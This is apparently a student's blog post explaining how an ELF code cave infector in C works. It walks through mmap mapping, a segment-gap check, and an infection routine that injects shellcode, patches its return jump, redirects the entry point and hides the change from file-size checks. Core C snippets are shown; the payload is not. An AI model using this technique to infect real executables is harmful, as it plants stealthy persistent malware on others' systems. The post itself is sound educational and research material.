Skip to main content

Deep Dive: Writing an ELF Code Cave Infector in C

·638 words·3 mins
JustThinkingHard
Author
JustThinkingHard
Cybersecurity student | Low level enjoyer

Disclaimer: This tool is a Proof of Concept (PoC) for educational purposes only.

Understanding how Linux executables work under the hood is the best way to understand system security. In this project, I built a “Code Cave Injector” — a tool that hides a payload inside an existing binary without changing its file size.

Here is a breakdown of how my Infektor tool works, referencing the source code.

The Concept: What is a “Code Cave”?
#

When a compiler (like GCC) builds a program, it organizes the code into Segments. To optimize memory access, these segments are aligned to Page Boundaries (usually 4096 bytes / 0x1000).

Because code rarely fits exactly into these 4096-byte blocks, there is often empty space (padding) filled with zeros at the end of the executable segment. This gap is called a Code Cave.

ELF Structure Diagram
Visualizing the gaps between segments in an ELF file.

My tool finds this gap and inserts shellcode into it.

Key Implementation Details
#

The injector performs three main tasks:

  1. Map the target binary into memory.
  2. Find a suitable gap (Code Cave) in the executable segment.
  3. Inject the payload and hijack the Entry Point.
  • 1. Memory Mapping (mmap)
    #

    Instead of using standard read/write calls, I used mmap. This maps the file directly into the program’s virtual memory space. Any change I make to the memory array file[] is written directly to the disk thanks to the MAP_SHARED flag.

    unsigned char *file = mmap(
        NULL,
        size,
        PROT_READ | PROT_WRITE,
        MAP_SHARED, // Writes sync back to the file
        fd,
        0
    );
  • 2.The Safety Check (calculate_gap)
    #

    This is the most critical part of the code. If we blindly inject code, we might overwrite the next segment (like .data or .rodata), crashing the program.

    I implemented a function calculate_gap that looks at the PT_LOAD segment headers to measure exactly how much space exists before the next segment starts.

    size_t calculate_gap(Elf64_Phdr *target, Elf64_Phdr *all_hdrs, int count, size_t file_size)
    {
        Elf64_Off target_end = target->p_offset + target->p_filesz;
        Elf64_Off nearest_next_start = file_size;
    
        // Scan all headers to find the one that starts immediately after our target
        for (int i = 0; i < count; i++) {
            Elf64_Off current_start = all_hdrs[i].p_offset;
            if (current_start >= target_end) {
                if (current_start < nearest_next_start) {
                    nearest_next_start = current_start;
                }
            }
        }
        return nearest_next_start - target_end;
    }

    If size_payload > available_gap, the tool aborts with a CRITICAL ERROR. This ensures reliability.

  • 3. Hijacking Execution (infection)
    #

    Once the space is confirmed, the injection happens.

    1. Copy Payload: I copy the shellcode to the end of the text segment.

    2. Patch Return Address: My payload needs to jump back to the original program so the user doesn’t notice anything. I calculate jt_offset and patch the jump_target variable inside the shellcode dynamically.

    3. Update Entry Point: Finally, I modify the ELF Header (e_entry) to point to my new code location (payload_va).

    int infection(int fd, Elf64_Ehdr *ehdr, Elf64_Phdr *phdr, unsigned char *file)
    {
        // ... logic to calculate offsets ...
    
        // Patch the payload with the original entry point
        memcpy(payload_dst + jt_offset, &original_entry, sizeof(Elf64_Addr));
    
        // Hijack the binary entry point
        ehdr->e_entry = payload_va;
    
        // Officially extend the segment size to include the payload
        phdr->p_filesz += size;
        phdr->p_memsz += size;
    
        return 0;
    }

Linking C and Assembly
#

One interesting challenge was linking the C injector with the Assembly payload. I used extern symbols to access labels defined in the .s file directly from C.

extern unsigned char payload_start;
extern unsigned long jump_target;

This allows the C code to measure the payload size dynamically and know exactly where to patch the jump addresses.

Conclusion
#

This project was a deep dive into the ELF file format. By manipulating Elf64_Phdr structures directly, I learned how the OS loader parses binaries. The result is a stealthy persistence mechanism that leaves the file size unchanged on the disk (ls -l shows no difference!).